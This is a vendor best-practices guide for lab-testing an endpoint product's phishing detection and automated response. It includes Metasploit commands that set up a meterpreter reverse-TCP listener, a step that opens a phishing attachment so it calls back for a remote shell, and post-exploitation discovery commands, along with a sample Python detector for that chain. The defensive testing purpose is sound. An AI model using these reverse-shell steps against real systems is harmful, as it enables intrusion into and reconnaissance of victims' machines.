Endpoint Secure_V6.0.2_Best Practices_Phishing Detection with Automated Response_Complete

Author: Lai
Sangfor Endpoint Secure

Best Practices: Phishing Detection with Automated Response
Product Version: 6.0.2

Document Version: 1.0

Released on: Sept. 27, 2023

Sangfor Technologies Inc.
Copyright © Sangfor Technologies Inc. 2023. All rights reserved.

Unless otherwise stated or authorized, Sangfor Technologies Inc. (hereinafter referred to as "Sangfor") and its affiliates reserve all intellectual property rights, including but not limited to copyrights, trademarks, patents, and trade secrets, and related rights to text, images, pictures, photographs, audio, videos, charts, colors, and layouts as presented in or concerning this document and content therein. Without prior written consent of Sangfor, this document and content therein must not be reproduced, forwarded, adapted, modified or displayed or distributed by any other means for any purpose.

Disclaimer

Products, services or features described in this document, whether wholly or in part, may be not within your purchase scope or usage scope. The products, services or features you purchase must be subject to the commercial contract and terms as agreed by you and Sangfor. Unless otherwise provided in the contract, Sangfor disclaims warranties of any kind, either express or implied, for the content of this document.

Due to product version upgrades or other reasons, the content of this document will be updated from time to time. Unless otherwise agreed, this document is used for reference only, and all statements, information, and recommendations therein do not constitute any express or implied warranties.

Technical Support

For technical support, please visit:  https://www.sangfor.com/en/about-us/contact-us/technical-support

Send information about errors or any product related problem to tech.support@sangfor.com.
About This Document

This document describes best practices for Phishing Detection with Automated Response in Sangfor Endpoint Secure.
Intended Audience

This document is intended for:

- All Users
Note Icons

English Icon

Description

Indicates an imminently hazardous situation which, if not avoided, will result in death or serious injury.

Indicates a potentially hazardous situation which, if not avoided, could result in death or serious injury.

Indicates a hazardous situation, which if not avoided, could result in minor or moderate injury.

Indicates a hazardous situation, which if not avoided, could result in settings failing to take effect, equipment damage, or data loss.

NOTICE addresses practices not related to personal injury.

Calls attention to important information, best practices, and tips.

NOTE addresses information not related to personal injury or equipment damage.
Change Log

Date / Change Description

Dec. 14, 2023: This is the first release of this document.
Contents

Technical Support

Change Log

1 Scenario

1.1 Prerequisites

2 Best Practices

2.1 Basic Configuration

2.1.1 Phishing Email

2.1.2 Continuous Attack

2.2 Clean Up Residual Files
1 Scenario

Phishing and web intrusion attacks are two of the most common methods threat actors use to infect user systems and steal confidential data, so it is important to be able to detect and protect against them. Endpoint Secure has developed stronger detection capabilities for attacks originating from email and Instant Messaging (IM). When an unsuspecting user downloads and executes a malicious attachment from their email or IM client, Endpoint Secure monitors all files and processes related to the malicious executable.

Users can visualize the attack in Advanced Threats and understand how the threat started and what it is trying to achieve. To mitigate these attacks quickly, users can configure Endpoint Secure to respond automatically, blocking and preventing attacks once they have been assessed as malicious.

1.1 Prerequisites

1.    Use the Kali image uploaded in the attachment to create the system. Do not modify the IP address, because Kali's address is fixed as 192.168.20.71 in the test sample. The account and password for the Kali login are root/@support123.

2.    Open the email sample in the attachment with Foxmail.

3.    Ensure that the test PC can reach Kali's IP address and that Kali can reach the test PC.

2 Best Practices

2.1 Basic Configuration

Step 1.     Navigate to Policies > Realtime Protection, disable Realtime File Protection, and select the Enable auto-fix of phishing attacks checkbox.

Step 2.     Disable Hacktool Protection. Both protections are disabled only for the duration of this test; re-enable them after the test is complete.

2.1.1 Phishing Email

Step 1.     Run MSF on Kali and listen for connections from the remote end. Enter the following commands manually; you can use the Tab key to complete them. Do not copy and paste from the document.

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.20.71

set lport 8888

run

Command / Function

msfconsole: Start the Metasploit console.

set lhost 192.168.20.71: Specify the IP address of Kali as the listening address.

Step 2.     Open the email and the attachment on the test PC.

Step 3.     The malware is disguised as a normal email attachment. Opening the attachment executes the malware, which connects back to Kali's IP address.

Step 4.     After the phishing sample executes, a session is established on Kali. You can use the shell command in MSF to enter the test PC's command line.

Step 5.     In the Endpoint Secure Manager console, go to Detection and Response > Intrusion Detection > Advanced Threats > Alert Mode, where the resulting alert is displayed.
2.1.2 Continuous Attack

Step 1.     Enter the shell command in MSF to open the CMD of the test PC.

Step 2.     Execute the following commands:

Command / Function

whoami: Get the username of the currently logged-in user.

ipconfig: Display network configuration information, such as the IP address and subnet mask.

systeminfo: Display detailed system information, such as the operating system version and installation date.

wmic process get: Get information about running processes.

Step 3.     Endpoint Secure detects the above behavior and generates the corresponding alerts.

Step 4.     At the same time, the security incident is fixed automatically.

Step 5.     You can also view the attack chain.
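To show what the attack chain in this section looks like from the detection side, here is an added Python example (not Sangfor's code and not the Endpoint Secure detection logic) that rebuilds the process lineage from constructed process-creation events and flags the discovery commands above only when they descend from a mail client and a shell; the event layout, PIDs and image names other than Foxmail are assumed placeholders.

```python
# Added example, not Sangfor's code: a toy process-tree detector for the
# phishing-to-recon chain tested in this guide. Events are constructed
# sample data in the form (pid, ppid, image, command line); the mail client
# name matches Foxmail as used here, all other names and PIDs are assumed.
EVENTS = [
    (100, 1, "explorer.exe", "explorer.exe"),
    (200, 100, "Foxmail.exe", "Foxmail.exe"),
    (300, 200, "attachment.exe", "attachment.exe"),  # opened from the mail
    (400, 300, "cmd.exe", "cmd.exe"),                # shell from the sample
    (401, 400, "whoami.exe", "whoami"),
    (402, 400, "ipconfig.exe", "ipconfig"),
    (403, 400, "systeminfo.exe", "systeminfo"),
    (404, 400, "wmic.exe", "wmic process get"),
    (500, 100, "notepad.exe", "notepad.exe"),        # benign sibling, no alert
]

MAIL_CLIENTS = {"foxmail.exe", "outlook.exe", "thunderbird.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
DISCOVERY = {"whoami.exe", "ipconfig.exe", "systeminfo.exe", "wmic.exe"}


def lineage(events, pid):
    """Return the image names from the root ancestor down to pid."""
    by_pid = {e[0]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:  # guard against PID reuse cycles
        seen.add(pid)
        chain.append(by_pid[pid][2])
        pid = by_pid[pid][1]
    return list(reversed(chain))


def detect(events):
    """Alert on discovery commands whose ancestry includes a mail client
    and a shell, i.e. the attack chain shown in Advanced Threats."""
    alerts = []
    for pid, _ppid, image, cmdline in events:
        if image.lower() not in DISCOVERY:
            continue
        chain = lineage(events, pid)
        names = {c.lower() for c in chain}
        if names & MAIL_CLIENTS and names & SHELLS:
            alerts.append({"cmdline": cmdline, "chain": " > ".join(chain)})
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(f"{alert['cmdline']!r} via {alert['chain']}")
```

The same commands run from a shell that does not descend from a mail client produce no alert, which is the distinction the parent-process chain gives a responder.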

 

2.2 Clean Up Residual Files

Please clean up the files after the test.

Attachments are usually saved under the following path: C:\Users\Administrator\AppData\Roaming\Foxmail7\

If you want to generate a new test event, restart the PC and delete the above two files.

Last modified: 2025-03-05